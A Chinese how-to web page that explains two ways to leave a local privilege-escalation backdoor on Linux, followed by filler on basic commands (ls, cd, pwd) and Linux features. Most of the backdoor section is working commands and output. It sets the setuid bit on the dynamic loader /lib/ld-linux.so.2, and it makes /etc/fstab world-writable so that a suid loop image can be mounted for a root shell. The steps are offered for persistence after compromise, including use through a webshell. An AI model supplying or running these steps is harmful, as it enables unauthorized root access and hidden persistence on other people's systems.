学习啦 > 学习电脑 > 操作系统 > Linux教程 >

linux下留本地后门方法有哪些

时间: 加城1195 分享

  Linux支持多用户,各个用户对于自己的文件设备有自己特殊的权利,保证了各用户之间互不影响,有时为了便利或者某些安全需要,我们需要在本地留下后门,那么下面一起看看linux下留本地后门的两个方法。

  方法步骤

  方法一:setuid的方法,其实8是很隐蔽。看看过程: [root@localdomain lib]# ls -l |grep ld-linux lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linu

  方法一:setuid的方法,其实8是很隐蔽。看看过程:

  [root@localdomain lib]# ls -l |grep ld-linux

  lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so

  lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.2

  [root@localdomain lib]# chmod s ld-linux.so.2

  [root@localdomain lib]# ls -l |grep ld-2.7.so

  -rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so

  lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so

  [root@localdomain lib]#

  我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。

  普通用户登录,测试下权限:

  [xiaoyu@localdomain ~]$ whoami

  xiaoyu

  [xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`

  root

  [xiaoyu@localdomain ~]$

  恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。

  方法二:

  看过程:

  [root@localdomain etc]# chmod a w /etc/fstab

  [root@localdomain etc]#

  这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下

  [xiaoyu@localdomain ~]$ ls -l /etc/fstab

  -rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab

  [xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab

  然后从本机把一个文件到目标机器上去,这里我们命名为test

  [xiaoyu@localdomain tmp]$ ls -l test

  -rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test

  [xiaoyu@localdomain tmp]$ mount test

  [xiaoyu@localdomain tmp]$ cd /mnt

  [xiaoyu@localdomain mnt]$ ls -l

  total 18

  drwx------ 2 root root 12288 2008-04-20 05:44 lost found

  -rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root

  [xiaoyu@localdomain mnt]$ ./root

  sh-3.2#

  看到了吧,从普通用户提升到root了。呵呵。

  test这个文件baidu貌似木有上传功能撒,木办法传

  貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....

  补充:Linux基本命令

  1.ls命令:

  格式::ls [选项] [目录或文件]

  功能:对于目录,列出该目录下的所有子目录与文件;对于文件,列出文件名以及其他信息。

  常用选项:

  -a :列出目录下的所有文件,包括以 . 开头的隐含文件。

  -d :将目录像文件一样显示,而不是显示其他文件。

  -i :输出文件的i节点的索引信息。

  -k :以k字节的形式表示文件的大小。

  -l :列出文件的详细信息。

  -n :用数字的UID,GID代替名称。

  -F : 在每个文件名后面附上一个字符以说明该文件的类型,“*”表示可执行的普通文 件;“/”表示目录;“@”表示符号链接;“l”表示FIFOS;“=”表示套接字。

  2.cd命令

  格式:cd [目录名称]

  常用选项:

  cd .. 返回上一级目录。

  cd ../.. 将当前目录向上移动两级。

  cd - 返回最近访问目录。

  3.pwd命令

  格式: pwd

  功能:显示出当前工作目录的绝对路径。

  相关阅读:Linux主要特性

  完全兼容POSIX1.0标准

  这使得可以在Linux下通过相应的模拟器运行常见的DOS、Windows的程序。这为用户从Windows转到Linux奠定了基础。许多用户在考虑使用Linux时,就想到以前在Windows下常见的程序是否能正常运行,这一点就消除了他们的疑虑。

  多用户、多任务

  Linux支持多用户,各个用户对于自己的文件设备有自己特殊的权利,保证了各用户之间互不影响。多任务则是现在电脑最主要的一个特点,Linux可以使多个程序同时并独立地运行。

  良好的界面

  Linux同时具有字符界面和图形界面。在字符界面用户可以通过键盘输入相应的指令来进行操作。它同时也提供了类似Windows图形界面的X-Window系统,用户可以使用鼠标对其进行操作。在X-Window环境中就和在Windows中相似,可以说是一个Linux版的Windows。

  支持多种平台

  Linux可以运行在多种硬件平台上,如具有x86、680x0、SPARC、Alpha等处理器的平台。此外Linux还是一种嵌入式操作系统,可以运行在掌上电脑、机顶盒或游戏机上。2001年1月份发布的Linux 2.4版内核已经能够完全支持Intel 64位芯片架构。同时Linux也支持多处理器技术。多个处理器同时工作,使系统性能大大提高。


linux下留本地后门相关文章:

1.有哪些方法可以检查Linux是否被入侵

2.如何实现linux操作系统对计算机病毒的防护

3.PHP后门原理实现是怎样的

4.Linux系统被入侵该如何检测

5.Linux操作系统的基本安全措施

4019750